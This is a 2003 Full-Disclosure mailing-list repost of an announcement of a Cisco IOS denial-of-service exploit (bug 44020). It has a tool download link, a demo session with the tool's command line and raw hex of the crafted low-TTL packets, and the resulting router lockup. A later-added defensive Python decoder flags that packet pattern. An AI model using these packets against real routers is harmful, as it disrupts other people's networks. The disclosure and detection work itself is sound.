[Full-Disclosure] Cisco Bug 44020

From: Shanphen Dawa (list_at_hardlined.com)
Date: 07/22/03

    To: full-disclosure@lists.netsys.com
    Date: Tue, 22 Jul 2003 12:44:39 -0500

    Here is supposedly a working Cisco exploit:
    http://www.elxsi.de/cisco-bug-44020.tar.gz
    This is pasted from security focus:
    http://www.securityfocus.com/archive/1/329765/2003-07-19/2003-07-25/0
    To: BugTraq
    Subject: Cisco IOS exploit (44020)
    Date: Jul 21 2003 4:01PM
    Author: Martin Kluge <martin elxsi de>
    Message-ID: <20030721160132.GA61689@elxsi.de>

    Hi,

    I'd like to submit a DoS attack against the recently found bug in
    almost all Cisco IOS versions (Cisco document ID 44020).

    The exploit can be found here (and it is included as attachment):

    http://www.elxsi.de/cisco-bug-44020.tar.gz

    This exploit is NOT broken (like the shadowchode.tar.gz exploit for example):

    Example:

    bash-2.05b# telnet 192.168.1.123
    Trying 192.168.1.123...
    Connected to 192.168.1.123.
    Escape character is '^]'.

    User Access Verification

    Username: 103
    Password: ******

    1003>show version
    IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc1)
    Copyright (c) 1986-2002 by cisco Systems, Inc.
    Compiled Mon 01-Apr-02 19:36 by srani
    Image text-base: 0x02004000, data-base: 0x0259733C

    ROM: System Bootstrap, Version 5.3.2(9) [vatran 9], RELEASE SOFTWARE (fc1)
    BOOTFLASH: 1000 Bootstrap Software (C1000-RBOOT-R), Version 10.3(9), RELEASE SOFTWARE
    (fc1)

    1003 uptime is 6 minutes
    System restarted by power-on
    System image file is "flash:c1000-bnsy56-mz.120-22.bin"

    cisco 1000 (68360) processor (revision D) with 15872K/512K bytes of memory.
    Processor board ID 03305903
    Bridging software.
    X.25 software, Version 3.0.0.
    Basic Rate ISDN software, Version 1.1.
    1 Ethernet/IEEE 802.3 interface(s)
    1 ISDN Basic Rate interface(s)
    7K bytes of non-volatile configuration memory.

    bash-2.05b#./cisco-bug-44020 192.168.1.1 192.168.1.123 1 0
    DEBUG: Hops: 1
    DEBUG: Protocol: 53
    DEBUG: Checksum: 47299
    DEBUG: 45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b
    DEBUG: Wrote 20 bytes.
    DEBUG: Protocol: 55
    DEBUG: Checksum: 61909
    DEBUG: 45 10 00 14 1f e5 40 00 01 37 d5 f1 c0 a8 01 01 c0 a8 01 7b
    DEBUG: Wrote 20 bytes.
    DEBUG: Protocol: 55
    DEBUG: Checksum: 55515
    DEBUG: 45 10 00 14 19 fe 40 00 01 37 db d8 c0 a8 01 01 c0 a8 01 7b
    DEBUG: Wrote 20 bytes.
    DEBUG: Protocol: 53
    DEBUG: Checksum: 10618
    DEBUG: 45 10 00 14 7b af 40 00 01 35 7a 29 c0 a8 01 01 c0 a8 01 7b
    DEBUG: Wrote 20 bytes.
    DEBUG: Protocol: 77
    DEBUG: Checksum: 40137
    DEBUG: 45 10 00 14 2c 24 40 00 01 4d c9 9c c0 a8 01 01 c0 a8 01 7b
    DEBUG: Wrote 20 bytes.
    <snip>
    ...
    <snip>
    bash-2.05b# telnet 192.168.1.123
    Trying 192.168.1.123...
    telnet: Unable to connect to remote host: No route to host

    If I login via term, I can see the following:

    Press RETURN to get started!

    00:00:30: %LINK-3-UPDOWN: Interface Ethernet0, changed state to up
    00:00:32: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet0, changed stp
    00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:1, changed staten
    00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:2, changed staten
    00:00:39: %SYS-5-CONFIG_I: Configured from memory by console
    00:00:39: %SYS-5-RESTART: System restarted --
    Cisco Internetwork Operating System Software
    IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc)
    Copyright (c) 1986-2002 by cisco Systems, Inc.
    Compiled Mon 01-Apr-02 19:36 by srani
    00:00:40: %LINK-3-UPDOWN: Interface BRI0, changed state to up
    1003>en
    Password: ******
    1003#show Interfaces Ethernet 0
    Ethernet0 is up, line protocol is up
      Hardware is QUICC Ethernet, address is 0060.7062.5727 (bia 0060.7062.5727)
      Internet address is 192.168.1.123/24
      MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec, rely 255/255, load 1/255
      Encapsulation ARPA, loopback not set, keepalive set (10 sec)
      ARP type: ARPA, ARP Timeout 04:00:00
      Last input 00:02:04, output 00:00:04, output hang never
      Last clearing of "show interface" counters never
      Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0
                   ^^
                   ||
                   The input queue is full :)

    Cheers,
    Martin Kluge

    --
    Name      : Martin Kluge
    email     : martin elxsi info
    Phone     : +49 160 1515182
    Projects  : http://www.aa-security.de
    GPG Key   : http://www.elxsi.de/key.pub

    I haven't had a chance to try it yet; let me know if you guys get anything out of it.
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
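Added example, not part of Martin Kluge's post or of his cisco-bug-44020 tool: a small decoder, from the defender's side, for the five raw IP headers shown in the DEBUG lines above. It parses each 20-byte header, verifies the IP header checksum over the bytes as they would appear on the wire, flags headers that match the bug 44020 pattern (TTL 0 or 1 plus one of the affected protocol numbers), and parses the `Input queue: size/max/drops/flushes` counter from the `show interfaces` output to detect the full-queue symptom. The hex lines are copied from the post; protocol 103 comes from Cisco's advisory for document ID 44020 and does not appear in the dump; the names `BUG_44020_PROTOCOLS`, `matches_bug_44020`, `flag_dumps` and `input_queue_full` are chosen here.

```python
"""Decode the IPv4 headers from the DEBUG dump and flag the bug 44020 pattern."""
import re
import struct

# The five 20-byte IP headers copied from the exploit's DEBUG lines above.
HEADER_DUMPS = [
    "45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b",
    "45 10 00 14 1f e5 40 00 01 37 d5 f1 c0 a8 01 01 c0 a8 01 7b",
    "45 10 00 14 19 fe 40 00 01 37 db d8 c0 a8 01 01 c0 a8 01 7b",
    "45 10 00 14 7b af 40 00 01 35 7a 29 c0 a8 01 01 c0 a8 01 7b",
    "45 10 00 14 2c 24 40 00 01 4d c9 9c c0 a8 01 01 c0 a8 01 7b",
]

# Protocol numbers Cisco's advisory for document ID 44020 lists as affected
# (53 SWIPE, 55 IP Mobility, 77 Sun ND, 103 PIM). The dump above only
# exercises 53, 55 and 77; 103 is taken from the advisory, not the post.
BUG_44020_PROTOCOLS = {53, 55, 77, 103}


def ip_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words.

    Run over a header that still contains its checksum field, the result
    is 0 when the header is intact.
    """
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_header(raw: bytes) -> dict:
    """Decode the fixed 20-byte IPv4 header into named fields."""
    if len(raw) < 20:
        raise ValueError("need at least 20 bytes of IPv4 header")
    (ver_ihl, tos, total_len, ident, flags_frag,
     ttl, proto, csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    ihl = (ver_ihl & 0x0F) * 4
    return {
        "version": ver_ihl >> 4,
        "ihl": ihl,
        "tos": tos,
        "total_length": total_len,
        "id": ident,
        "df": bool(flags_frag & 0x4000),
        "ttl": ttl,
        "protocol": proto,
        "checksum": csum,
        # Verify over the whole header (IHL), not just the first 20 bytes.
        "checksum_ok": ihl <= len(raw) and ip_checksum(raw[:ihl]) == 0,
        "src": ".".join(str(b) for b in src),
        "dst": ".".join(str(b) for b in dst),
    }


def matches_bug_44020(hdr: dict) -> bool:
    """A well-formed IPv4 packet with TTL 0/1 and one of the affected protocols,
    i.e. a packet the router would queue for itself instead of forwarding."""
    return (hdr["version"] == 4 and hdr["checksum_ok"]
            and hdr["protocol"] in BUG_44020_PROTOCOLS and hdr["ttl"] <= 1)


def decode_dumps(dumps):
    """Parse a list of space-separated hex dumps into header dicts."""
    return [parse_ipv4_header(bytes.fromhex(d)) for d in dumps]


def flag_dumps(dumps):
    """Indices of the dumps that match the 44020 pattern."""
    return [i for i, h in enumerate(decode_dumps(dumps)) if matches_bug_44020(h)]


INPUT_QUEUE_RE = re.compile(r"Input queue:\s*(\d+)/(\d+)/(\d+)/(\d+)")


def input_queue_full(show_interfaces_output: str) -> bool:
    """True when the 'Input queue: size/max/drops/flushes' counter in
    'show interfaces' output reports size >= max, the symptom shown above."""
    m = INPUT_QUEUE_RE.search(show_interfaces_output)
    if not m:
        return False
    size, max_ = int(m.group(1)), int(m.group(2))
    return size >= max_


if __name__ == "__main__":
    for i, h in enumerate(decode_dumps(HEADER_DUMPS)):
        print(i, h["src"], "->", h["dst"], "proto", h["protocol"], "ttl", h["ttl"],
              "csum_ok", h["checksum_ok"], "44020" if matches_bug_44020(h) else "")
```

All five dumps verify and match: TTL is 1 (the tool's "Hops: 1"), the protocol bytes 35/37/4d are 53, 55 and 77, and the checksum bytes recompute to zero. Note that the tool's own "Checksum:" lines print the value in host byte order (47299 is 0xB8C3, while the wire carries c3 b8); the decoder checks the bytes directly, so it does not depend on that quirk.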